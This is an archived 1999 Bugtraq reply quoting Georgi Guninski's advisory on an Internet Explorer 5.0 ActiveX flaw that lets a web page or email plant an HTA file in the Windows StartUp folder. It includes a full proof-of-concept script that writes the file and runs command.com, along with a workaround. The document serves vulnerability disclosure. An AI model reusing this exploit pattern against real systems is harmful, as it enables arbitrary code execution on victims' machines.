Re: IE 5.0 allows executing programs

From: Micheal Patterson (dredsterat_private)
Date: Sun Aug 22 1999 - 23:02:54 PDT


    This apparently works on NT 4.0 sp5 and IE 5.00.2014.0216IC as well.
    
    Micheal Patterson
    pattersonmat_private
    
    
    ----- Original Message -----
    From: Georgi Guninski <joroat_private>
    To: <BUGTRAQat_private>
    Sent: Saturday, August 21, 1999 11:17 AM
    Subject: IE 5.0 allows executing programs
    
    
    > Disclaimer:
    > The opinions expressed in this advisory and program are my own and not
    > of any company.
    > The usual standard disclaimer applies, especially the fact that Georgi
    > Guninski is not liable for any damages caused by direct or indirect use of the
    > information or functionality provided by this program.
    > Georgi Guninski, bears NO responsibility for content or misuse of this
    > program or any derivatives thereof.
    >
    > Description:
    >
    > Internet Explorer 5.0 under Windows 95/98 (do not know about NT)
    > allows executing arbitrary programs on the local machine by creating and
    > overwriting local files and putting content in them.
    >
    > Details:
    >
    > The problem is the ActiveX Control "Object for constructing type
    > libraries for scriptlets".
    > It allows creating and overwriting local files and, moreover, putting
    > content in them.
    > There is some unneeded information in the file, but part of the content
    > may be chosen.
    > So, an HTML Application file may be created, fed with exploit
    > information and written to the StartUp folder.
    > The next time the user reboots (which may be forced), the code in the
    > HTML Application file will be executed.
    > This vulnerability can be exploited via email.
    >
    > Demonstration is available at: http://www.nat.bg/~joro/scrtlb.html
    >
    > Workaround:
    > Disable Active Scripting
    > or
    > Disable Run ActiveX Controls and plug-ins
    >
    > The code is:
    >
    > <object id="scr"
    >    classid="clsid:06290BD5-48AA-11D2-8432-006008C3FBFC"
    > >
    > </object>
    > <SCRIPT>
    > scr.Reset();
    > scr.Path="C:\\windows\\Start Menu\\Programs\\StartUp\\guninski.hta";
    > scr.Doc="<object id='wsh' classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object><SCRIPT>alert('Written by Georgi Guninski http://www.nat.bg/~joro');wsh.Run('c:\\command.com');</"+"SCRIPT>";
    > scr.write();
    > </SCRIPT>
    > </object>
    >
    > Regards,
    > Georgi Guninski
    > http://www.nat.bg/~joro
    >
    



    This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:57:59 PDT